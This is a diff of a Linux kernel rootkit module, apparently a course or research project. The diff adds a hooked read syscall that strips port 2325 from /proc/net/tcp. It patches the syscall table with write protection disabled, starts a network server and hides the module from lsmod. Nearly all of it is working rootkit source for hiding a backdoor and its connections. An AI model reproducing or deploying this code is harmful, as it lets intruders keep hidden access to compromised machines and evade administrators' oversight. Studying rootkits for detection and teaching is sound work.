|
|
|
|
@ -85,6 +85,72 @@ asmlinkage long sys_getdents_new(unsigned int fd,
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
/*** FUNCTION ****************************************************************
|
|
|
|
|
* NAME: hide port
|
|
|
|
|
* DESCRIPTION: hides the port 2325
|
|
|
|
|
* PARAMETERS: -
|
|
|
|
|
* RETURNS:
|
|
|
|
|
*******************************************************************************/
|
|
|
|
|
read_ptr orig_read;
|
|
|
|
|
asmlinkage long hacked_read(unsigned int fd, char __user *buf,
|
|
|
|
|
size_t count)
|
|
|
|
|
{
|
|
|
|
|
long result, bp, diff_in_bytes;
|
|
|
|
|
char *kbuf, *start_line, *end_line, *port_num;
|
|
|
|
|
char *pathname, pbuf[256];
|
|
|
|
|
struct files_struct *current_files;
|
|
|
|
|
struct fdtable *files_table;
|
|
|
|
|
struct path file_path;
|
|
|
|
|
|
|
|
|
|
// run real read
|
|
|
|
|
result = (*orig_read)(fd,buf,count);
|
|
|
|
|
if (result <= 0)
|
|
|
|
|
return result;
|
|
|
|
|
|
|
|
|
|
// get pathname
|
|
|
|
|
// CITATION [8] from report
|
|
|
|
|
current_files = current->files;
|
|
|
|
|
files_table = files_fdtable(current_files);
|
|
|
|
|
|
|
|
|
|
file_path = files_table->fd[fd]->f_path;
|
|
|
|
|
pathname = d_path(&file_path,pbuf,256*sizeof(char));
|
|
|
|
|
// if virtual file /proc/net/tcp
|
|
|
|
|
if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
|
|
|
|
|
// copy from user to kernelspace;
|
|
|
|
|
if (!access_ok(VERIFY_READ,buf,result))
|
|
|
|
|
return -1;
|
|
|
|
|
if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
|
|
|
|
|
return -1;
|
|
|
|
|
if (copy_from_user(kbuf,buf,result))
|
|
|
|
|
return -1;
|
|
|
|
|
|
|
|
|
|
// filter out hidden ports
|
|
|
|
|
start_line = strchr(kbuf,':') - 4; // skip first line
|
|
|
|
|
diff_in_bytes = (start_line - kbuf) * sizeof(char);
|
|
|
|
|
for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
|
|
|
|
|
start_line = kbuf + bp;
|
|
|
|
|
port_num = strchr(strchr(start_line,':') + 1,':') + 1;
|
|
|
|
|
end_line = strchr(start_line,'\n');
|
|
|
|
|
diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
|
|
|
|
|
if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
|
|
|
|
|
memmove(start_line,end_line + 1, // delete line in file
|
|
|
|
|
result - bp - diff_in_bytes);
|
|
|
|
|
result -= diff_in_bytes;
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
// copy from kernel to userspace
|
|
|
|
|
if (!access_ok(VERIFY_WRITE,buf,result))
|
|
|
|
|
return EINVAL;
|
|
|
|
|
if (copy_to_user(buf,kbuf,result))
|
|
|
|
|
return EINVAL;
|
|
|
|
|
kfree(kbuf);
|
|
|
|
|
}
|
|
|
|
|
// return number of bytes read
|
|
|
|
|
return result;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
/*** FUNCTION ****************************************************************
|
|
|
|
|
* NAME: hide_module
|
|
|
|
|
* DESCRIPTION: hides the module from lsmod
|
|
|
|
|
@ -116,12 +182,15 @@ static int __init init_8008135(void) {
|
|
|
|
|
// add our new handlers
|
|
|
|
|
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
|
|
|
|
|
|
|
|
|
|
orig_read = (read_ptr)sys_call_table[__NR_read];
|
|
|
|
|
|
|
|
|
|
sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read;
|
|
|
|
|
|
|
|
|
|
// turn write protect back on
|
|
|
|
|
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
|
|
|
|
|
|
|
|
|
|
printk(KERN_INFO "New syscall in place\n");
|
|
|
|
|
network_server_init();
|
|
|
|
|
|
|
|
|
|
hide_module();
|
|
|
|
|
printk(KERN_INFO "Module hidden");
|
|
|
|
|
|
|
|
|
|
@ -140,6 +209,7 @@ static void __exit exit_8008135(void) {
|
|
|
|
|
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
|
|
|
|
|
// set getdents handler back
|
|
|
|
|
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
|
|
|
|
|
sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read;
|
|
|
|
|
// turn write protect back on
|
|
|
|
|
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
|
|
|
|
|
printk(KERN_INFO "Old syscall back\n");
|
|
|
|
|
|
